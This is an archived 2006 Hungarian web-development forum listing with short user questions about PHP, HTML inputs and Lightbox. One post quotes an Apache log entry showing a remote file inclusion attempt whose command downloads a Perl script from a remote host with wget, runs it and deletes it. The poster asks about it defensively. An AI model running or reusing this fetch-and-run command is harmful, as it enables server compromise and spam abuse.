ugrás a tartalomhoz

Archívum - Már 31, 2006 - Fórum téma

Szöveges dokumentum (txt) szerkesztése weblapon

Anonymous · 2006. Már. 31. (P), 16.16
Üdv mindenkinek

Hogyan tudok szerkeszteni egy txt dokumentumot weboldalon keresztül? Köszönöm a segítséget előre is.
 

HTML beviteli mező maszkolása

Anonymous · 2006. Már. 31. (P), 14.16
Sziasztok!

Hogyan lehet HTML lapokon az inputbox-okat maszkolni?

Köszi
 

Levélküldésnél parse error

Anonymous · 2006. Már. 31. (P), 09.13
 

Beléptető és azonosító rendszer PHP-ben

Anonymous · 2006. Már. 31. (P), 07.46
Sziasztok!

Tudtok valahol olyan helyet ahonnan kész beléptető és felhasználó azonosít php programokat lehetne letölteni vagy ajánlanni rá egy jó algoritmust?

Köszi
 

Lightbox felett jelenik meg a Flash animáció

Anonymous · 2006. Már. 31. (P), 07.37
Sziasztok!

Van egy olyan problémám, van ez a Lightbox script. Ezzel megnyitok egy képet, viszont a weboldalon lévő flash felül marad. Van ötletetek, hogy hogyan lehetne azt is hátra küldeni, ha a kép megjelenik és visszahozni, ha a kép eltűnik?

Köszi
 

Script futtatási kisérlet?

Anonymous · 2006. Már. 31. (P), 06.51
A rendszergazdánk ilyet talált az apache access.log-ban:
valami.php?cont=http://tavoli-domain.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://tavoli-domain2.com/gif.txt;perl%20gif.txt;rm%20-rf%20gif*
A domain neveket kicseréltem, a fájlnevek valósak. Belép a /temp-be, letölt egy perl scriptet amit futtat majd torol. Én csak az nem értem, még ha sikerülne is beincludolnia a $_GET["cont"]-on keresztül egy távoli php fájlt (nem sikerült, de tetelezzuk fel), az akkor sem a mi szerverünkön hajtódna végre, hanem a tavoli-domain.com-on. Innentől kezdve azt tudom elképzelni, hogy a tavoli-domain.com-on akartak scriptet futtatni, és ezzel a probalkozassal a mi szerevrünk ip-címe kerülne be az ottani access.log-ba. Jól gondolom?
Ennek ellenére csak sikerült a mi szerverünk /temp-jébe is irni, a levelezőszerverünkön keresztül spam-eket probaltak küldeni egy scripttel.
Egyéb tényezőktöl eltekintve (miért van wget,perl,php system() függvény engedélyezve), nyugtassatok meg, h a fenti próbálkozással nem lehet irni a /temp-be.